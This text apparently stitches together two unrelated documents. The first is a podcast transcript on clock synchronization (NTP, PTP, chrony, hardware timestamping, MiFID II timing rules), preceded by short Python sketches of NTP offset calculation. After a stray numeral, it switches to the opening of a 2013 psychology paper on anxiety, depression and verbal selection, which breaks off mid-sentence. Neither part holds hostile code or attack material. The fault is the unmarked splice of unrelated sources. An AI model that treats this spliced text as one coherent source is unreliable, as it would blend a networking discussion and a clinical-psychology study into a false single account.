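A minimal sketch of the four-timestamp calculation described above, in Python. The variable names and toy values are invented for illustration; the formulas are the standard NTP offset/delay arithmetic, and they only hold under the equal-delay assumption just discussed — any asymmetry between the two one-way delays shows up directly as error in the offset, bounded by half the measured round-trip delay.

# t1: client transmit time, t2: server receive time,
# t3: server transmit time, t4: client receive time.
def ntp_offset_and_delay(t1, t2, t3, t4):
    # Offset of the server clock relative to the client clock
    # (positive means the client is behind the server).
    offset = ((t2 - t1) + (t3 - t4)) / 2.0
    # Round-trip network delay, with the server's processing time removed.
    delay = (t4 - t1) - (t3 - t2)
    return offset, delay

# Toy example: client clock 5 ms slow, 1 ms of network delay each way,
# 0.5 ms of processing time on the server.
offset, delay = ntp_offset_and_delay(10.0000, 10.0060, 10.0065, 10.0025)
print(offset, delay)  # ~0.005 (5 ms offset), ~0.002 (2 ms round trip)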
What they’ll do is they’ll take a number of samples from a single server, but many times you have multiple servers configured so you’ll take many samples from multiple servers, and you’ll sort of apply different criteria to these things to decide if you should even consider them. I think the reference implementation of NTPD has this notion of a “popcorn spike,” where if your offset, you know, if you’ve gotten back 30 samples and they all kind of look about the same, but then you get one that’s wildly off, you just kind of say like, “I’m gonna ignore that one, because likely that was just due to some crazy queueing somewhere in the network or something like that.” You can sort of think of this as a kind of voting algorithm: You have a bunch of different oracles that are telling you things about what time is, you kind of bring them all together and have some way of computing an aggregate assumption about what the time currently is that tries to be robust to errors and drop outliers and the like. Yeah, I think that’s right. You try to pick out the people who are lying to you, right? Some of those servers you might be talking to upstream might just be telling you incorrect things. They’re generally referred to in sort of NTP parlance as falsetickers, and the ones who are not falsetickers are truechimers. I’m not sure why exactly these are the names, but these are some of the names you might see if you’re looking around the internet. So you try and pick out the ones that are telling you the truth. You apply some other various heuristics to them to try and figure out which ones you think are the best, right? Which ones maybe have the smallest error bars – even though you might think that these are decent sources to use some of them might have wider error bars than others, right, like your samples may represent a sort of wider range than the other ones – so you try and figure out which ones are the best and then you use that to sort of tell your operating system to effectively speed up or slow down its frequency correction for how off it is, and try and sort of remove that error over time. You don’t just abruptly adjust the time that the system thinks it is. Most time daemons will not aggressively step the clock. The reason for that is that most applications do not enjoy when the time just changes drastically, especially not when it changes drastically in the negative direction. This highlights another property you want out of your clocks, which we haven’t touched on yet, which is: we said we want our clocks to be accurate. Your criterion for what it means for them to be right is you go to them and ask them what time it is, and they give numbers pretty close to each other. But there’s another property you want, which is you want the clocks to, in a micro sense, advance about a second per second and you especially want it to never go backwards, because there are lots of algorithms on a computer, which are making the assumption implicitly and you know, naively reasonably, that the clocks only go forward, and lots of things can get screwed up when you allow clocks to jump backwards. Right. So, a way that you can maintain that property that you just mentioned, while still correcting, is simply effectively tell the operating system like “Hey, slow down. 
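A toy illustration of the falseticker/truechimer voting idea described above — this is not the actual selection algorithm used by ntpd or chrony, just a simplified median-and-cutoff sketch with made-up server names and thresholds:

import statistics

def combine_offsets(offsets_by_server, max_deviation=0.010):
    # offsets_by_server maps a server name to its measured offset in seconds.
    # Servers whose offset is more than max_deviation from the median are
    # treated as falsetickers and ignored; the rest are averaged.
    median = statistics.median(offsets_by_server.values())
    truechimers = {name: off for name, off in offsets_by_server.items()
                   if abs(off - median) <= max_deviation}
    return statistics.mean(truechimers.values()), sorted(truechimers)

estimate, used = combine_offsets(
    {"ntp-a": 0.0021, "ntp-b": 0.0018, "ntp-c": 0.0023, "ntp-d": 1.7})
print(estimate, used)  # "ntp-d" is rejected as a falseticker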
I want to have time slow down effectively such that like this error gets removed, but I don’t have to actually step time backwards and make applications sad.” And I actually remember this, personally, from many years ago where the one place where I really intersected with clock synchronization in a serious way was, I was asked to look at Jane Street’s clock synchronization on its Windows machines. I wrote a small program that sent little NTP packets to the Windows machines, which knew the NTP protocol and responded appropriately. And they had the four timestamps on them, and instead of trying to compute the average I actually computed upper and lower bounds on how far the clock sync was off and generated a little graph to see what was going on. And I remember being quite surprised to discover that if you graphed how far off the clocks were you’d see this weird sawtooth behavior where the clocks would go out of sync, and then, bang, they would be in sync again, and then slowly out of sync and then in sync again. And that’s because the Windows NTP daemon we were running was configured to just smash the clock to the correct value and not do any of the kind of adjusting of the rate, which I think if I remember correctly, that’s called slewing, which is, I think, a term I’ve heard in no other context. Okay, so NTP lets you, in fact, do the slewing in an appropriate way so you can keep the rates pretty close to the real-time rates, but still, over time, slowly converge things back if they are far apart. In practice, how quickly can NTP bring clocks that are desynchronized back together? At least with some of the newer time daemons… so I don’t know what the default is for the reference implementation. I know with some of the newer daemons like chrony, the default is that it takes 12 seconds to remove one second of error. So depending on how far away you were you can sort of like work it out, right, 12 seconds to remove one second. So if you were a day, it’d be 86,400 times 12, which is a lot of seconds. So that’s actually quite fast, which means the rate at which the clock moves forward can be off by on the order of 10%, which is pretty aggressively pushing on the gas there. And these knobs are adjustable. If you really want to you can sort of change the max rate at which they will attempt to make these adjustments. So, we had clock synchronization working on our systems before you started in 2012, and yet you needed to redo it. What were we doing, and why did we have to redo it? So, we did what I’m sure lots of people do. We discussed GPS appliances before – so we have some GPS appliances, which are bringing us accurate-ish time, and then we pointed a bunch of time servers at those GPS appliances using NTP, and we pointed a bunch of clients at those time servers, and we sort of dusted our hands off and said, “Ah, done.” There was no real requirements around what is the maximum error. Are we trying to maintain anything? If you look at any given time can you tell us how far off any given system is from, say, UTC? And so that served us fine for a while. The main motivation for some of the work that was done was a bunch of different financial regulations that happened in Europe, but one of them specifically had to do with time synchronization, and what it said was that you have to be able to show that your clocks are in sync with UTC to within 100 microseconds. So the 100 microsecond number was the big change. At first, when we first heard this requirement. It’s like, “Well. Maybe we’re good. 
We don’t actually know at the moment like maybe we’re just fine.” Okay, and so we looked at it, and were we just fine? No, definitely not. So it was, I think I said it before, but like most systems were like a couple hundred microseconds out, but the real problem, or one of the real problems, was that they sort of would bounce all over the place. Like sometimes they could be relatively tight, say 150 microseconds, but various things would happen on the system that could disturb them and knock them, say, four or 500 microseconds out of alignment. If a bunch of systems all start on a given computer at the same time, and they all start using the processors very aggressively, that’ll fundamentally change the heat profile of the system. As the heat profile changes the frequency will change and then the time daemon might have a harder time keeping the correct time, because the frequency is no longer what it was before, and it has to sort of figure it out as it goes. So, I started sort of investigating, “Okay, how can we solve this problem? Like what do we have to do,” and sort of just started looking into various different things. I didn’t know, at the beginning of all this, can we solve this problem with NTP? Is NTP capable of solving this problem or do we have to use some different, newer, better protocol? Because NTP has been around for a long time. I definitely did the dumb thing, right, and I went to Google and I said, “How do you meet MiFID II time compliance regulations,” or something along those lines, and probably many different sort of combinations of those words to try and find all the good articles. If you just do that, what you find out is that everyone tells you should be using PTP, which is the Precision Time Protocol. It’s a completely different protocol. And if you go read on the internet, you’ll see that it is capable of doing “better time synchronization” than NTP, but nobody really tends to give you reasons. Lots of people will say things like “NTP is good to milliseconds. PTP is good to microseconds,” but without any sort of information backing that. So if you just do that, you’re like, “Well. We should clearly just run PTP. No problem. Let’s just do that.” So I did a bunch of research trying to figure out is that a good idea? So the first thing I also wanted to understand was what is magic about PTP? What makes it so much better than NTP, such that you can say these things like NTP is good to milliseconds, PTP is good to microseconds. Where does the precision of the Precision Time Protocol come from? Exactly. And what I found actually surprised me to some extent. The protocol is a little different. The sort of who sends what messages when is a little bit different. It involves multicast, which is different. But at the end of the day, it’s those same four timestamps that are being used to do the calculation, which I found a bit surprising. I was sort of like, “Now, if it’s the same four timestamps, more or less, what is it about PTP that makes it much more accurate?” And what I was able to find is, I think it’s basically three things. One is that many, many hardware vendors support hardware timestamping with PTP – so your actual network cards, we sort of talked about the packet showing up at the network, it having to raise an interrupt, the CPU having to get involved to schedule the application, right. You do all this stuff and then eventually get a timestamp taken. 
PTP, with hardware timestamping, as soon as that packet arrives at the network interface card, it can record a timestamp for it, and then when it hands the packet up to the application it says, “Here’s our packet. Oh, and by the way, here’s the timestamp that came with it.” We were talking before about trying to move those timestamps as close as you could, such that they, actually the difference of them represented the delay from the client to the server and from the server to the client; so if you push them sort of down the stack to the hardware it means that you’re going to have much more accurate timestamps, and you’ll have a much better chance that those things are actually symmetric, meaning you’re taking good time. And it also removes a lot of the other uncertainty in taking those timestamps, such as scheduling delay, interrupt delay, other processes competing for CPU on the box, stuff like that, so that’s one thing. So, you have hardware timestamping as a PTP thing. Another thing is the frequency of updates. So I think by default PTP sends its sync messages to clients once every second, whereas, at least for the reference implementation of NTPD, I believe the lowest you can turn that knob for how often should I query my server is once every eight seconds, so you have the hardware timestamping, you have the frequency of updates. And then the other bit of it is the fact that lots of switches – so I think PTP was basically designed with the idea that you’d have all of the sort of network contributing to your time distribution, and so all of your switches can also get involved and help you move time across the network while understanding their own delays that they’re adding to it, and so they can kind of remove their own delays and help you move time accurately across the network. At least that’s the, that’s kind of the intent of PTP. The idea is, I guess, you can do in some sense, the moral equivalent of what NTP does with the two middle timestamps. Where there are two timestamps in NTP that come from the server that’s reporting time. It’s like when it receives and then when it sends out and you get to subtract out from the added noise that gap between those two timestamps, and then the idea is you can do this over and over again across the network, and so delays and noise are introduced by, for example, queueing on the switch, would go away. Like you would essentially know how much those delays were and as a result, you could potentially be much more accurate. Yeah. I think that’s roughly the conclusion I came to, that that’s what makes PTP more accurate than NTP, which was surprising to me. And then I did a bunch of research and was talking to various people in the industry, and at various conferences and stuff, and there was some agreement that you can make NTP also very accurate you just have to control some of these things, so there are… in addition to being able to do hardware timestamping with PTP packets some cards, these days, support the ability to hardware timestamp all the packets, and if your machine is just acting as an NTP server and most of the packets it receives are NTP packets, well then you’re effectively timestamping NTP packets. Some cards also will timestamp just NTP packets. They can sort of recognize them and timestamp only those, but it was sort of like “Okay if we have the right hardware, we can get the timestamping bit of it. That’s kind of an interesting thing. 
With the different NTPD implementation, chrony being the other implementation I’m talking about as opposed to the reference one, you can turn that knob for how frequently you should poll your server, I think as much as like 16 times a second. There’s a bit of like diminishing returns there, it’s not always better to go lower… point being, you can tune it to at least match sort of what PTP’s default of once a second. And the more I dug, and the more I talked to people, the more people told me, “Hey, you definitely do not want to involve your switches in your time distribution. If you can figure out a way to leave them out of it, you should do so.” I was happy to hear that in some ways, because right now the reliability. or the sort of, the responsibility of the time distribution kind of lies with one group, and that’s fine. When you then have this responsibility shared across multiple groups, right, it becomes a lot more complicated. Every switch upgrade, suddenly, you’re concerned. “Well, Is it possible that this new version of the firmware you’re putting on that version of that particular switch has a bug related to this PTP stuff and is causing problems?” Given all of that, I started to believe that it was possible that we could solve this problem of getting within 100 microseconds using NTP and I sort of set out to try and see if I could actually do that. It seems like in some sense, the design of PTP where it relies for its extra accuracy on these switches violates this old end-to-end property that people talk about as the design of the internet of trying to get as much of the functionalities you can around the edge of the system. And I think that is motivated by a lot of the kind of concerns you’re talking about: you have more control over the endpoints, and you want to rely on the fabric for as little as possible. I guess the other reason you want to rely on the fabric it’s not just that there are different groups, and like, “ Oh, it’s hard to work with people in different areas and coordinate.” It’s also in various ways, fundamentally harder to manage networks than it is to manage various other kinds of software, but the reality is, in many organizations, in many contexts, a lot of getting the network right involves an extremely good, extremely well trained, extraordinarily careful human being, just going in and changing the configs and not getting it wrong. It’s kind of a terrifying system, and the less complexity, you can ask the people who have to go in and do this terrifying thing of modifying the network, the less complexity you can ask them to take care of the better. I mean, that’s a very, very true point. And another aspect of it is having less black-box systems involved. So, chrony is an open-source project, we can sort of inspect the code and see what it’s doing and understand how it behaves. The GPS appliances are not but the idea of having less black-box systems where, “Hey, that’s really strange. Why did we see this spike? We have absolutely no idea.” The amount we can minimize that kind of stuff, the better. Right. The primary currency of the sysadmin is inspectability. You want to be able go in and figure out what the hell is happening. Yes. Huge proponent of things you can inspect and debug. You talked a bunch about hardware timestamping, and I have a kind of dumb and mechanical question about all this, which is you talked about essentially software processes keeping clocks up to date. 
You have this NTP daemon that knows how to adjust the rates of things and stuff, but then you talked about the NIC going in timestamping packets. So does the NIC have a hardware clock and the motherboard have a hardware clock, or the CPU? How are these clocks related to each other? What’s actually going on when you’re doing hardware timestamping? Yeah, the NIC also has a hardware clock. Is it a different time? Do you have to run NTP between the NIC and the host system? I think that would be challenging, but like yes, you can use a thing from the Linux PTP project to move time from a network card to the system. It’s called phc2sys. That’s just a thing you can do, You have time on your network cards, you can move that time to the system, you can move it from the system to another network card, you can kind of shift this time around in various ways. But yes, the cards themselves do also have a clock on them that you’re also keeping in sync. So another thing you mentioned about PTP is that it uses multicast. So, I’ve had the chance to sit down and talk at length with Brian Nigito, in a previous episode of this podcast, about multicast, and I’m curious what role multicast plays here in the context of PTP? The whole idea is that at the sort of root of this time distribution tree you have what’s known as a grandmaster, and you can have multiple grandmasters, and a grandmaster is just something that doesn’t need to be getting PTP, time from PTP. It’s like you know the GPS reference or something else. You have this grandmaster you can have multiple ones. There’s a thing called the best master clock algorithm for the participants of PTP to determine which of them is the best one to act as the grandmaster at any given time, and then the idea is that you multicast out these packets to say, “Here’s my first timestamp,” and it just makes it easier on the network. As a PTP client, you just have to come on and start listening for these multicast messages and then you can start receiving time, as opposed to you having to actually reach out and be configured to go talk to the server. You can just sort of have less configuration and start receiving these time updates from the grandmaster. Got it. So you think it’s mostly a kind of zero-configuration kind of story. It also makes it easier for the grandmaster. You don’t have to maintain these connections. You don’t have to have all these sockets open. You just sort of have like one socket there kind of multicasting out. It’s not 100% true, because there’s a delay request and a delay response message that’s involved in all this too. And it’s also actually kind of strange… I think this was recently changed in the most recent version of PTP, but technically the way it works is the grandmaster sends this multicast message that is a synchronization message which contains one of those timestamps. 
When the client receives it, it actually sends a multicast message back that says, “Hey, I’d like a delay request,” and then when the grandmaster receives that it sends out another multicast message that says, “Here’s the delay response,” which is kind of insane when you think about it, right, because you’re, you’re involving all of these other potential peers that are listening in on the network with your exchange, and you can configure some of these open-source projects – like the Linux PTP project, which uses a daemon called ptp4l – you can configure it to do a hybrid model where it receives the sync message as a multicast message, but then since it knows where that message came from it just does a unicast delay request and then delay response, which makes a lot more sense. Yeah, the base behavior you’re describing sounds pathological, right? Essentially, quadratic. You get…. Everyone sends a message to everyone. That is not usually a recipe for good algorithmic complexity. I’m not sure why it was designed that way. It could be that the original people were sort of thinking that you’d have these smaller domains where you have these boundary clocks. Or sort of you’re multicasting… you’re sort of limited to how many people you’re talking to. But I kind of agree the default behavior seems a little crazy to me, and that’s why in our case, where we are using PTP (we’re using it in a small area of the world) we have it configured to do that hybrid thing where the actual sync message comes in multicast, but the delay request and the delay response wind up being unicast. There’s a major thing that I haven’t touched on here, which is that NTP, I mentioned it before you have multiple servers, and you kind of have this built-in notion of redundancy, right, where you’re sort of comparing all the times from the different servers, and you’re trying to figure out which of them are falsetickers, right, and so if any of them misbehave, the protocol kind of has this built-in notion of trying to call them out and ignore them. With PTP, we’re talking about the single grandmaster, that would be a GPS appliance, and unfortunately, we have found black box GPS appliances to be less than ideal. It would be fine, if you’re just talking about a straight failure scenario, right? We have a GPS appliance, maybe we have two of them, they have agreed amongst themselves who is the grandmaster. One of them goes offline, the other one notices that, it picks up, starts broadcasting. That would be a perfectly fine world and I wouldn’t be too concerned about it, but the thing that we’ve seen happen is we want to perform maintenance on a GPS appliance because its compact flash card is running out of life and we need to actually replace that. When you go to shut it down, it happens to send out a PTP packet that is like complete crazy pants, like just absolutely bonkers. It makes no sense whatsoever. The timestamp is off the charts. And we’ve had GPS appliances do things like that, and so part of my thinking through this was, you know, “Geez, at the end of the day I really don’t want to be pulled back to a single GPS appliance that is providing time to potentially large swathes of the network,” because if it goes crazy there’s no real provisions in PTP for finding the crazy person everybody will just follow those crazy timestamps wherever they lead. At least for a while. 
It sounds like there’s a way of eventually deciding someone else is the right one to pay attention to, but it means for short periods of time you may end up just listening to the wrong guy. I’m not an expert in exactly what’s involved in the best master clock algorithm, but I thought what was in the best master clock algorithm was simply about how good your clock was, and so if you were sitting there saying, “I have the best clock. It’s fantastic.” but then you’re telling people the completely wrong time because you had some kind of a bug or misconfiguration, you would continue to operate in that mode indefinitely. That’s fascinating. What it sounds like is despite the fact that PTP is newer, and, in some ways, shinier, and in some ways having fundamentally better capabilities for some aspect of what it’s doing, it also just threw out a bunch of the careful engineering that had gone into NTP over a long period, because NTP has significantly more robust ways of combining clocks than what you’re describing for PTP. Yes, that was my kind of interpretation of looking at all this stuff: it feels like we threw out a lot of the safety, and that makes me super nervous based on my experience with these devices. So here we are, we have an NTP solution that’s not working well enough, and a PTP solution that’s kind of terrifying. So, where’d you go from there? So, we’re trying to build a proof of concept. At the end of the day, we sort of figured, “All right. We have these GPS appliances.” We talked about hardware timestamping before on the GPS appliances, and how they can’t hardware timestamp the NTP packets, so that’s problematic. We thought, “How can we move time from the GPS appliances off into the rest of the network?” And so we decided that we could use PTP to move time from the GPS appliances to a set of Linux machines, and then on those Linux machines we could leverage things, like hardware timestamping, and the NTP interleaved mode to move the time from those machines onto machines further downstream. The NTP interleaved mode, just to give a short overview of what that means… when you send a packet if you get it hardware timestamps on transmission the way you use that hardware timestamp is you get it kind of looped back to you as an application. So I transmit a packet, I get that hardware timestamp after the packet’s already gone out the door. That’s not super useful from an NTP point of view, because really you wanted the other side to receive that hardware timestamp, and so the interleaved mode is sort of a special way in which you can run NTP and that when you transmit your next NTP packet you send that hardware timestamp that you got for the previous transmission, and then the other side, each side can use those. I don’t want to get into too much of the details of how that works, but it allows you to get more accuracy and to leverage those hardware timestamps on transmission. I see. And this was already built into existing NTP clients, this ability to take advantage of hardware timestamps by moving them to the next interaction. That’s not a thing you had to invent. Nope, it’s existed for a while, and it, I think given with the reference NTP implementation it can leverage timestamps taken at the driver level to do something similar, but chrony adds the ability to actually leverage hardware timestamps in the same fashion, sort of sending them in the next message so that they can calculate a more accurate difference. 
Because hardware timestamps are a relatively new invention of all of this, right? When NTP was designed I don’t think there was any devices that did hardware timestamping. I think that is true, and as I was saying before, when this all first came to fruition the things that supported hardware timestamping were PTP specific. Okay, so now you have an infrastructure where there’s a bunch of GPS devices, a layer of Linux servers, which get time via PTP from those GPS devices, and then act as NTP servers for the rest of the network. So maybe I missed, why does that first layer have to use PTP rather than NTP? The major reason is that the GPS appliances… its apropos to what we were just talking about… The GPS appliances will hardware timestamp their PTP because they have dedicated cards for it, but they don’t hardware timestamp their NTP, so the quality of time that you’re getting off of the GPSes if you’re talking NTP to them – like, if you just remove the time servers and you have the clients talk directly to the GPS appliances, for example – it’s just going to be a lot lower quality. And to be honest, I don’t know if they support the interleaved mode of NTP, like it’s not something I ever really dug into. It sort of goes back to that black box thing of like, “Well, we can configure this thing in such a way that it spits out hardware timestamped PTP and be relatively confident that it’s doing that job.” But anything more esoteric gets a little dicey. Got it. And you solve the false ticker problem by basically having each Linux server that’s acting as a kind of NTP… marrying each one of those to an individual GPS device. So if that GPS device is crazy then the Linux server will say crazy things, but then things internally on the network are going to, in a fault-tolerant way, combine together multiple of these Linux servers and be able to use the high accuracy way of getting data from those servers. That’s exactly right. We constrain the servers that any given client can pick using various sort of knobs within chrony because we want to meet certain requirements, and so we would like to ensure that any given client is going to talk to his local NTP server as opposed to one that is, say, 600 microseconds away somewhere, because as soon as you go to talk to that one that’s 600 microseconds away, you introduce a lot of potential error. And so what we do is we force the NTP clients to talk to their local servers, and then we also configure them to talk to a bunch of other servers, which are sort of too far away to get very high accurate time, but we use them just as you described, to sort of call out and figure out if either of the two local ones have gone crazy. If both of the two local ones have gone crazy. Well, we’re kind of out of luck. How well did this all work in practice? It worked surprisingly well. So sort of designing the system coming up with a system that can do this stuff and remain fault-tolerant and all that is one thing, but then there’s also the other thing of show me, right, like show me that you’re within 100 microseconds of UTC. So that required understanding like, what are the errors? 
And that comes back to the sort of asymmetry question and understanding things like if the NTP daemon is not accepting updates from its server for whatever reason because maybe it thinks the server is crazy, or because it thinks that the samples it just took are incorrect like maybe you had a popcorn spike or something like that, it’ll do a thing where it’ll basically increment a number that represents its uncertainty about how much it might be drifting while not getting good updates from its server, and so you kind of have to add together all these different errors. You have that one, you have the known error introduced by the actual time daemon, the time daemon… what it knows how far off it is, and then you have that round-trip time divided by two that I mentioned. So if you take all that, added together, you kind of have to do a similar thing for the PTP segment I mentioned, and then you kind of have to add on the 100 nanoseconds for the GPS that I mentioned. If you can add all that together, most of our servers, we can show that we are absolutely no worse error than about 35 microseconds, most of the time, assuming not some extenuating circumstances. So a design choice we made in this whole thing was your best bet for getting good time to clients is to have a dedicated network for it. Dedicated NIC, dedicated network, have it be quiet, nice, you know, no interference, but that’s expensive and annoying, and nobody really wants to do that. It’s expensive in a few ways. It’s expensive in the physical hardware, you have to provision, but it’s also just expensive in the net complexity of the network, right? I think there’s a lot of reasons why we want to try and keep the network simple and having a whole separate network just sounds like a disaster from a management perspective. Agreed. Right. So I was like, “I really don’t want to go down that road.” So we sort of said, “Well. Let’s see what happens.” And so I was just saying, most of the time we can attest that we are better than 35 microseconds, you know, 35 mics of error worst case, but there are situations where you can cause that to fall over. You can… for example, we have some clients that don’t support hardware timestamping. They’re just older generation servers, they don’t have NICs with hardware timestamping. If on those things, you just saturate the NIC for five minutes solid you’re probably going to get your error bounds outside of 100 mics, just going to happen. But on newer machines that do support hardware timestamping you can do things like that, and still stay within 50 mics of UTC, which is pretty cool. Some of this is built upon the fact that we know we have a very smart networking team, we’re confident in the ship that they run and the way our networks are built in that kind of stuff that lends something to the not wanting to build a dedicated time network, and we think we can get by without it. And so that’s sort of where we ended up around 35 mics. I want to say it’s 35 to 40 mics for systems that don’t have hardware timestamping on the client-side, and closer to 20 mics for systems that do have hardware timestamping on the client-side. And as I mentioned, the systems that do have hardware timestamping on the client side are kind of more robust to problems, to just things that people might do. You know, maybe somebody’s debugging something and they want to pull a 10 gigabyte core dump off of a machine. 
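The error budget described above is just a sum of independently tracked terms. The sketch below uses invented numbers purely to show the shape of the calculation; the real figures would come from the time daemon's statistics, the PTP segment, and the GPS receiver's specification, not from these constants.

```python
# Back-of-the-envelope worst-case error bound, per the breakdown discussed above.
# All values in microseconds and purely illustrative.

def worst_case_error_us(
    gps_error_us=0.1,          # ~100 ns from the GPS grandmaster
    ptp_segment_error_us=5.0,  # GPS appliance -> Linux time server, over PTP
    daemon_error_us=10.0,      # what the NTP daemon reports, incl. drift while holding off updates
    round_trip_us=40.0,        # client <-> server round trip
):
    # Half the round trip bounds the error a hidden path asymmetry could introduce.
    asymmetry_bound_us = round_trip_us / 2.0
    return gps_error_us + ptp_segment_error_us + daemon_error_us + asymmetry_bound_us

print(f"worst case = {worst_case_error_us():.1f} microseconds")   # ~35 with these numbers
```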
They’re not thinking about the timestamping on the machine right now like they’re focused on their job to try and actually figure what happened with that system. So the other aspect of all this was reporting on it and showing it. How do we surveil to show that we are actually in compliance? And so for that, we took what we think is a relatively reasonable approach, which is: we sample. And so there’s kind of no interval at which you can sample which is small enough if you want to be absolutely sure that all the time you were never out of compliance, right? You could say, “Well. What’s a reasonable sample? Every five seconds? No, that’s definitely too much. Okay, every one second? Maybe that’s fine. Every hundred milliseconds,” right, so where do you stop? So we sort of decided that for machines that go out of compliance it is likely that if we sampled every 10 seconds, we would pick them up because it’s not like there’s these crazy perverse spikes that sort of jump in there and then disappear. It is more like somebody’s SCPing a large file across the network, or something is misconfigured somewhere, and then therefore it is a sort of persistent state that sticks around for a while. So we sample every 10 seconds, pulling out these sort of various stats I mentioned about what represents the total error, and then we pump that into effectively a big database all day long, and then at various times throughout the day, we surveil that database and look for any systems that are not sort of meeting their time obligations. We hold different systems to different levels of accuracy. So after all of this, not that I want to call this into existence, but imagine that there’s a new version of European regulations, MiFID III comes out and says, “Now you have to be within 10 microseconds.” Assuming that technology is still as it is now what would you have to do to get the next order of magnitude in precision? Not this. So I think probably you’d want to go to something like PTP, but probably not just PTP directly. There’s a thing called White Rabbit, which is kind of like some PTP extensions, basically. I think it might actually be completely formalized in the most recent PTP specification. But that is a combination of roughly PTP with synchronous ethernet. So synchronous Ethernet allows you to get syntonization across the network, so you can sort of make sure that the frequencies are the same. Can I ask you what the word syntonization means? It just basically means that those two, the frequencies are in sync. So it doesn’t mean that we have the same time, but it means that we are sort of advancing at the same rate. I see. So there are techniques, essentially, that let you get the rate the same without necessarily getting the clocks in sync first. Correct. And is my understanding that White Rabbit sort of uses this idea that you can have the rates the same, with PTP, to work out some additional constraints that they can solve and get sub-nanosecond time synchronization. I think we would have to put a lot more thought into the sort of reliability and redundancy story. I sort of discounted PTP because it didn’t necessarily have the best reliability/redundancy story. It’s not to say we couldn’t have figured out a way to make it work for us. We almost certainly could’ve. 
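A minimal sketch of that 10-second sampling and surveillance loop might look like the following; the host names, budgets, and in-memory "database" are placeholders rather than anything from the production system.

```python
import time

SAMPLE_INTERVAL_S = 10
BUDGETS_US = {"trading-host": 100, "office-host": 1000}   # illustrative per-class budgets

samples = []   # stand-in for "a big database"

def record_sample(host, error_us, ts=None):
    """Store one (timestamp, host, estimated total error) sample."""
    samples.append((ts if ts is not None else time.time(), host, error_us))

def violations(since_ts):
    """Hosts that exceeded their error budget at any sample since `since_ts`."""
    return sorted({host for ts, host, err in samples
                   if ts >= since_ts and err > BUDGETS_US.get(host, 100)})

# A collector would call record_sample(host, estimated_error_us) for every host
# each SAMPLE_INTERVAL_S seconds, where estimated_error_us is assembled from the
# daemon's reported error, the round-trip/2 term, the PTP segment, and the GPS
# spec as described above; a periodic job then calls violations(start_of_day).
```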
You could have two grandmasters, one sitting there as the primary doing its normal operation, one sitting there as a standby, and if the primary one goes crazy for some reason you, could have some automated tooling or something that an operator could use to take it out of service, and bring the secondary into service and only have maybe a minor service disruption. I can imagine us doing that work but given the problem, we were trying to solve it seemed not necessary. We can solve this problem using this existing technology, but I do think if we had to go much lower like you said an order of magnitude lower, we’d have to start looking at something else. Well. Thank you, so much. This has been really fun. I’ve really enjoyed learning about how the whole wild world of clock synchronization is knit together. Well. Thank you, very much. It was a pleasure being here. It’s a pleasure talking about these things. It’s fun to try and solve these interesting, challenging problems. You can find links related to the topics that Chris and I discussed, as well as a full transcript and glossary at signalsandthreads.com. Thanks for joining us, and see you next week.
2
Opposite effects of anxiety and depressive symptoms on executive function (2013)
Author manuscript; available in PMC 2015 Aug 1. Cogn Emot. Published in final edited form as: Cogn Emot. 2014 Aug; 28(5): 893–902. Published online 2013 Dec 3. p 10.1080/02699931.2013.859568 PMCID: PMC4020950 NIHMSID: NIHMS537913 PMID: 24295077 Opposite effects of anxiety and depressive symptoms on executive function: The case of selecting among competing options Author information Copyright and License information Disclaimer Abstract People constantly face the need to choose one option from among many, such as when selecting words to express a thought. Selecting between many options can be difficult for anyone, and can feel overwhelming for individuals with elevated anxiety. The current study demonstrates that anxiety is associated with impaired selection across three different verbal tasks, and tests the specificity of this finding to anxiety. Anxiety and depression frequently co-occur; thus, it might be assumed that they would demonstrate similar associations with selection, although they also have distinct profiles of symptoms, neuroanatomy, and neurochemistry. Here, we report for the first time that anxiety and depressive symptoms counterintuitively have opposite effects on selection among competing options. Specifically, whereas anxiety symptoms are associated with impairments in verbal selection, depressive symptoms are associated with better selection performance. Implications for understanding the mechanisms of anxiety, depression, and selection are discussed. Keywords: executive function, selection, anxiety, depression One of the defining human characteristics is that we can engage executive functions to respond to a given environmental context in a wide variety of ways, rather than being tied to habitual responses. This ability allows us to engage in an almost infinite repertoire of behaviors. This capacity for generativity (the ability to produce an infinite number of variety of responses) has long been considered definitional for the most human behavior of all: language. But like all cognitive abilities, it comes at a cost: with the capacity to generate infinite options comes the difficulty of choosing among them. We constantly face the need to choose one option from among many, such as when we select words to express a thought. For example, when constructing a sentence, a speaker must not only choose the intended message but must also select among multiple words that are all compatible with the intended message. People are slowed, and prefrontal executive function areas are engaged, when selection demands are high, that is, when there is competition between multiple automatically activated representations, which must be resolved in order for the speaker to select a single response for output (e.g., Snyder & Munakata, 2008; Snyder et al., 2010). Selecting between many options can be difficult for anyone, and can feel overwhelming for individuals with elevated anxiety. People with anxiety disorders find coping with too many options particularly difficult, and struggle with making decisions, indecisiveness, and intolerance of uncertainty (e.g., Rassin, Muris, Franken, Smit, & Wong, 2007). Whereas decision-making deficits in persons with anxiety have previously been shown in complex or affective tasks (e.g., Rassin et al., 2007), the selection deficits that lie at the core of these problems are observed even in a simple language-production task (Snyder et al., 2010). 
To explain these and other findings, we have developed a unified, biologically-plausible model of selection among competing options (Snyder et al., 2010). Our model demonstrates how competitive, inhibitory dynamics among neurons in prefrontal cortical networks can support selection between alternatives. Specifically, these competitive dynamics serve to sharpen cognitive representations by amplifying activity in the most active, task-relevant, representations (e.g., the most appropriate word to complete a sentence) and by suppressing competing representations (e.g., for the many other word possibilities; Snyder et al., 2010). Our model demonstrates how reduced inhibitory (i.e., GABAergic) function can lead to reduced competitive dynamics in prefrontal cortical networks, allowing non-winning competitors (alternative responses that are not selected) to become more active and to compete over a longer period, which impairs selection. As predicted by this model, (a) the GABA agonist midazolam improved selection; and (b) greater anxiety, which has been linked to reduced GABAergic function, was associated with more difficulty selecting between competing word options and reduced activation in prefrontal executive function areas during such selection (Snyder et al., 2010). However, an important question remains as to whether deficits in selection are uniquely related to anxiety, or could be affected by other forms of co-occurring psychopathology. Specifically, anxiety and depression are highly correlated at the symptom level (e.g., Stöber & Joormann, 2001), and frequently comorbid at the disorder level; approximately 60% of individuals with major depressive disorder also have an anxiety disorder (e.g., for review see Rivas-Vasques et al., 2004). Anxiety and depression can begin before, concurrently, or after one another, and often recur throughout the lifespan (Moffitt et al., 2007). Comorbid anxiety and depression often produce worse outcomes than either alone, including more severe symptoms, higher rates of recurrence, worse psychosocial function, and poorer treatment response (e.g., Moffitt et al., 2007; Rivas-Vasques et al., 2004). Some research also suggests that both anxiety and depression can contribute to cognitive deficits; for example, anxiety and depression are each associated with deficits in executive function (EF, e.g., Snyder et al., 2010; Snyder, 2013). Co-occurring anxiety and depression may have additive effects on EF deficits, as evidenced by studies that have found that individuals with comorbid depressive and 